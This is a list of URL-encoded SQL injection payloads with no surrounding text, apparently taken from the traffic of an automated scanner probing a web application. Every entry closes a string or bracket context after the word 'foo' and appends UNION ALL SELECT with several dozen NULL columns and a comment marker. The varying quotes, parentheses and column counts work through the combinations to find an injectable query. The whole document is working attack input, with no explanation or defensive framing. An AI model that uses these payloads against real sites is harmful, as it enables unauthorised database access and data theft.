foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 